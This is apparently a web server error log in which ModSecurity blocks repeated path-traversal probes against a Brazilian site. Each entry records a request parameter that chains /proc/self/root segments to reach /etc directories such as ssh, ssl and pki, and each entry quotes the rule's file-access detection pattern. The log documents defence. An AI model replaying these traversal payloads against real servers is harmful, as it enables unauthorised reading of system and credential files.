[Tue Mar 17 09:09:50.807808 2026] [:error] [pid 7000:tid 140411565680384] [client 74.7.243.203:57494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEjRePVOt35XCGZP8s0wAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:52.331209 2026] [:error] [pid 1210:tid 140411624429312] [client 74.7.243.203:36668] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEkFKJy4A1bGlmj9BSiQAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:53.515718 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:36676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEkQeiSKl8TjouI-b_ZwAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:55.918622 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:36680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEk-82sZHvlq4xgHq_9gAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:09:57.238777 2026] [:error] [pid 2325:tid 140411666392832] [client 74.7.243.203:36694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEle82sZHvlq4xgHq_-QAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:10:05.463729 2026] [:error] [pid 1210:tid 140411557287680] [client 74.7.243.203:36710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEnVKJy4A1bGlmj9BSlAAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:10:09.469650 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.243.203:40346] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEoaBJNF7axNlVR0X6EwAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:10:10.802887 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.243.203:45500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEou82sZHvlq4xgHrACAAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:11:21.507439 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.241.46:57600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablE6QQohV2v-7oj5HH4NgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:11:33.551688 2026] [:error] [pid 1961:tid 140411590858496] [client 74.7.241.46:48484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablE9XRXaaWotPICgYsiqQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:11:44.654826 2026] [:error] [pid 7000:tid 140411649607424] [client 74.7.243.203:34808] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFABePVOt35XCGZP8tBAAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:11:53.313169 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.243.203:34820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFCQeiSKl8TjouI-b_sgAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:01.198055 2026] [:error] [pid 11469:tid 140411540502272] [client 74.7.243.203:46762] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFEZDEJR9VXonE_-1L9QAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:09.414470 2026] [:error] [pid 1210:tid 140411590858496] [client 74.7.243.203:52674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFGVKJy4A1bGlmj9BSwQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:12:10.276170 2026] [:error] [pid 7000:tid 140411641214720] [client 74.7.241.46:52636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFGhePVOt35XCGZP8tJgAAA4w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:11.543409 2026] [:error] [pid 1961:tid 140411590858496] [client 74.7.241.46:51706] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFG3RXaaWotPICgYsiswAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:12.124903 2026] [:error] [pid 1961:tid 140411548894976] [client 74.7.243.203:50030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFHHRXaaWotPICgYsitAAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:12.661839 2026] [:error] [pid 7000:tid 140411582465792] [client 74.7.241.46:51720] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFHBePVOt35XCGZP8tJwAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:13.480448 2026] [:error] [pid 11469:tid 140411649607424] [client 74.7.243.203:50032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFHZDEJR9VXonE_-1L_QAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:13.999495 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.46:51724] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFHQeiSKl8TjouI-b_vAAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:15.159279 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.46:51736] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFHweiSKl8TjouI-b_xwAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
